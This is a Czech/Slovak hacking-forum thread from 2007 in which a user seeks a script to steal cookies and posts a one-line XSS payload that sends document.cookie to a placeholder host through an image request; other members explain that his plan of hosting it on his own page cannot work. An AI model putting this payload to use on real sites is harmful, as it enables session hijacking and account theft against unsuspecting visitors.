xss script hijacking

HackForum

xss script hijacking#
ahojte potreboval by som tento script pre steal cookies, nema ho niekto ?:)
(odpovědět)
ivoralik | E-mail | ICQ 440-343-63625.10.2007 14:32
re: xss script hijacking#
tak nasiel som ho

<script>
new Image().src="blabla"+encodeURI(document.coo
kie);
</script>

len mi poradte ako ho mam upravit:(
(odpovědět)
ivoralik | E-mail | ICQ 440-343-63627.10.2007 18:22
re: xss script hijacking#
Čemu na tom nerozumíš? Připadá mi, že spíš ani nevíš, k čemu ten script slouží. Schválně mi svými slovy vysvětli, k čemu jej chceš použít... :)

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP27.10.2007 21:25
re: xss script hijacking#
tak spis nevim,do js sa nevyznam
potrebujem ho ku steal cookies,script si hodim na stranku a obet navstivi tuto stranku a cookies jej stealnem
(odpovědět)
ivoralik | E-mail | ICQ 440-343-63628.10.2007 9:51
re: xss script hijacking#
ivoralik: OK, tak začni tím, že si přečteš něco o XSS. Při té příležitosti se dozvíš i odpověď na svou otázku. Pokud bys ten script hodil na svůj web, tak bys získal maximálně tak cookie ze svého webu, nic víc :) Ten script musíš umístit na ten server, ze kterého chceš cookies krást.

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP28.10.2007 12:18
re: xss script hijacking#
moment,je cookie chcem krast priamo nejakej osobe,myslel som to tak,ze na svoju stranku si hodim script,obet pride na stranku a tak jej ukradnem cookies
(odpovědět)
ivoralik | E-mail | ICQ 440-343-63628.10.2007 14:17
re: xss script hijacking#
to by potom ukládání citlivých informací do cookies ztrácelo smysl :-)

----------
Get enlightened!
(odpovědět)
mr.Crow | E-mail | Website28.10.2007 19:30
re: xss script hijacking#
ivoralik: Tak takhle to tedy opravdu nefunguje :)

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP28.10.2007 18:07
re: xss script hijacking#
ivoralik: Vis vubec co je to cookie??
(odpovědět)
RubberDuck. | 85.71.165.*28.10.2007 19:56
re: xss script hijacking#
ivoralik: kolikrat jsi videl Matrix?
(odpovědět)
( I ) | 85.132.198.*28.10.2007 20:11
re: xss script hijacking#
to mi chcete povedat ze cookies sa nedaju stealnut?
(odpovědět)
ivoralik | E-mail | ICQ 440-343-63628.10.2007 20:42
re: xss script hijacking#
daji, ale ne tvojim zvlastnim a nerealnym zpusobem
(odpovědět)
( I ) | 85.132.198.*28.10.2007 21:22
re: xss script hijacking#
preco by neslo vyuzit chybu ie? pomocou js stealnut cookies?tak ze ten js hodim na svoju stranku ,obet ju navstivi a cookie mi ulozi do dokumentu,to sa predsa da nie?
(odpovědět)
ivoralik | E-mail | ICQ 440-343-63629.10.2007 7:24
re: xss script hijacking#
ivoralik: Ale uvedom si k cemu slouzi cookies?? Myslis ze ma kazdy pocitac vsude v internetu stejne cookies at uz jsou tady na SOOMu nebo treba na GOOGLu??
(odpovědět)
RubberDuck. | 85.71.165.*29.10.2007 12:15
re: xss script hijacking#
ivoralik ty se radeji uz o nic nepokousej, pac s tvou demenci nemas na nic sanci. Neumis hledat v googlu, to je uz znamka toho, ze jsi idiot. Navic jsi DOTED nepochopil, ze tvuj zpusob je nefunkcni a naprosto nerealny
(odpovědět)
( I ) | 85.132.198.*29.10.2007 12:53
re: xss script hijacking#
Zas až tak nereálné to není, pokud se budeme bavit o chybách v prohlížečích. Občas se objeví nějaký ten exploit, který umožní zapsat cookie pod cizí doménou, nebo přečíst cookie jiného serveru. To už se ale dostáváme k jinému problému, než jakým byl dotazovaný problém. Tyto chyby jsou téměř okamžitě opravovány a navíc jejich zneužití není tak jednoduché, aby stačil script, který jsi zde naznačil.

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP29.10.2007 14:51

Zpět
 
 
 

 
BBCode